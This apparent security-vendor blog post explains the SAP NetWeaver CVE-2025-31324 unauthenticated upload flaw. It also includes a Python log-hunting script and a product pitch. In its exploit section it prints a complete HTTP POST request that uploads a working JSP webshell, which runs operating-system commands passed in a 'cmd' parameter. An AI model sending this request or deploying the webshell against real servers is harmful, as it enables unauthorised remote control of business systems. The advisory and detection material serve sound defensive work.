CVE-2025-31324: SAP NetWeaver Remote Code Execution Vulnerability Explained
On April 24th, 2025, SAP disclosed a critical vulnerability affecting SAP NetWeaver Visual Composer. CVE-2025-31324 is an unauthenticated file upload vulnerability with a CVSS score of 10.0 (Critical) that allows adversaries to upload executable files and execute commands remotely. SAP NetWeaver is used by a wide range of organizations across different industries, especially large corporations and government agencies. Given the severity of the vulnerability, organizations are advised to patch their vulnerable assets without delay.
In this blog, we explain how the SAP NetWeaver CVE-2025-31324 vulnerability works and how organizations can defend against CVE-2025-31324 attacks.
SAP NetWeaver CVE-2025-31324 Vulnerability Explained
SAP NetWeaver acts as the technical backbone for many SAP applications, including ERP (Enterprise Resource Planning), CRM (Customer Relationship Management), and other business solutions. NetWeaver provides the tools and environment needed for building, deploying, and running applications that are critical to business operations. It supports a range of functions, such as application development, data management, system integration, and process orchestration.
On April 24th, 2025, SAP disclosed a critical vulnerability identified in their NetWeaver Visual Composer. CVE-2025-31324 allows adversaries to upload malicious executables without authentication, which can be leveraged for remote code execution. The vulnerability stems from an endpoint designed to simplify the uploading of metadata files. Due to CVE-2025-31324, the endpoint allows unrestricted file uploads, which lets adversaries deploy webshells directly into sensitive directories on the vulnerable server.
SAP released an emergency security update to address the CVE-2025-31324 vulnerability. Organizations are advised to patch their vulnerable SAP NetWeaver servers. Patching fixes the vulnerability, but if attackers exploited it before the patch, backdoors like webshells or command-and-control beacons might still be present. Thus, security teams should also conduct proactive threat hunting across the SAP environment, especially looking for post-exploitation activities.
How Does the SAP NetWeaver CVE-2025-31324 Exploit Work?
The CVE-2025-31324 vulnerability is caused by a flaw in the /developmentserver/metadatauploader endpoint. This endpoint does not properly validate or restrict the types of files that can be uploaded. Adversaries can craft a malicious HTTP POST request targeting the vulnerable endpoint and upload JSP webshells into specific server paths. The uploaded webshell acts as a backdoor and allows attackers to run arbitrary operating system commands remotely.
The following example HTTP POST request has been observed in use by threat actors to deploy JSP webshells through the CVE-2025-31324 vulnerability.
POST developmentserver/metadatauploader?CONTENTTYPE=MODEL&CLIENT=1 HTTP/1.1
Host: <IP_of_vulnerable_SAP_NetWeaver>
User-Agent: python-requests/2.32.3
Accept-Encoding: gzip, deflate, zstd
Accept: */*
Content-Length: 636
Content-Type: multipart/form-data; boundary=816121b0328c3864dc7963b2e0275e90

--816121b0328c3864dc7963b2e0275e90
Content-Disposition: form-data; name="file"; filename="helper.jsp"
Content-Type: application/octet-stream

<%@ page import="java.util.*,java.io.*"%>
<%
if (request.getParameter("cmd") != null) {
    String cmd = request.getParameter("cmd");
    Process p = Runtime.getRuntime().exec(cmd);
    OutputStream os = p.getOutputStream();
    InputStream in = p.getInputStream();
    DataInputStream dis = new DataInputStream(in);
    String disr = dis.readLine();
    while (disr != null) {
        out.println(disr);
        disr = dis.readLine();
    }
}
%>
--816121b0328c3864dc7963b2e0275e90--
SAP NetWeaver CVE-2025-31324 Vulnerability Exploit Example Seen in the Wild
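For the threat hunting recommended above, the following added example (not from the original article, Picus, or SAP) scans HTTP access logs for POST requests to the uploader endpoint and for later .jsp requests that carry a cmd parameter, as the sample webshell does. The Common Log Format input, the hunt and normalise function names, and the sample log lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import parse_qs, unquote

UPLOAD_PATH = "/developmentserver/metadatauploader"  # endpoint named in the article
# Assumption: Common Log Format lines, e.g. from a reverse proxy in front of NetWeaver.
LINE_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] '
                     r'"(?P<method>[A-Z]+) (?P<target>[^\s"]+)[^"]*" (?P<status>\d{3})')

def normalise(path):
    """Percent-decode, lower-case and collapse repeated slashes before matching."""
    return re.sub(r"/+", "/", "/" + unquote(path).lower()).rstrip("/")

def hunt(lines):
    """Return (line_no, kind, client_ip, detail) for each suspicious request."""
    findings, uploaders = [], set()
    for line_no, line in enumerate(lines, 1):
        m = LINE_RE.match(line)
        if not m:
            continue  # not an access-log line in the assumed format
        raw_path, _, query = m["target"].partition("?")
        path, ip = normalise(raw_path), m["ip"]
        if m["method"] == "POST" and path == UPLOAD_PATH:
            # A 2xx status means the server accepted the unauthenticated POST.
            kind = "upload_accepted" if m["status"].startswith("2") else "upload_attempt"
            uploaders.add(ip)
            findings.append((line_no, kind, ip, m["status"]))
        elif path.endswith(".jsp") and "cmd" in parse_qs(query, keep_blank_values=True):
            # The webshell in the sample request reads its command from "cmd".
            kind = "webshell_cmd_after_upload" if ip in uploaders else "jsp_cmd_param"
            findings.append((line_no, kind, ip, path))
    return findings

# Constructed log lines (documentation IP ranges, placeholder paths), not real traffic.
SAMPLE_LOG = [
    '198.51.100.7 - - [25/Apr/2025:09:12:01 +0000] "GET /index.html HTTP/1.1" 200 5120',
    '203.0.113.50 - - [25/Apr/2025:09:13:44 +0000] '
    '"POST /developmentserver/metadatauploader?CONTENTTYPE=MODEL&CLIENT=1 HTTP/1.1" 200 42',
    '203.0.113.50 - - [25/Apr/2025:09:13:59 +0000] '
    '"GET /example/helper.jsp?cmd=whoami HTTP/1.1" 200 17',
    '192.0.2.9 - - [25/Apr/2025:10:02:10 +0000] '
    '"POST /developmentserver//MetadataUploader?CONTENTTYPE=MODEL&CLIENT=1 HTTP/1.1" 403 0',
    '198.51.100.7 - - [25/Apr/2025:10:05:00 +0000] "GET /app/report.jsp?id=7 HTTP/1.1" 200 900',
]

if __name__ == "__main__":
    for finding in hunt(SAMPLE_LOG):
        print(finding)
```

An upload_accepted finding, or any .jsp request with a cmd parameter, warrants checking the server for files written after the matching timestamp, since patching alone does not remove a webshell that is already in place.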
How Does Picus Help Simulate SAP NetWeaver CVE-2025-31324 Attacks?
We also strongly suggest simulating the SAP NetWeaver CVE-2025-31324 vulnerability to test the effectiveness of your security controls against sophisticated cyber attacks using the Picus Security Validation Platform. You can also test your defenses against other vulnerability exploitation attacks, such as regreSSHion, Citrix Bleed, and Follina, within minutes with a 14-day free trial of the Picus Platform.
Picus Threat Library includes the following threats for SAP NetWeaver CVE-2025-31324 vulnerability exploitation attacks:
Threat ID | Threat Name | Attack Module
--- | --- | ---
73061 | SAP Web Attack Campaign | Web Application
Start simulating emerging threats today and get actionable mitigation insights with a 14-day free trial of the Picus Security Validation Platform.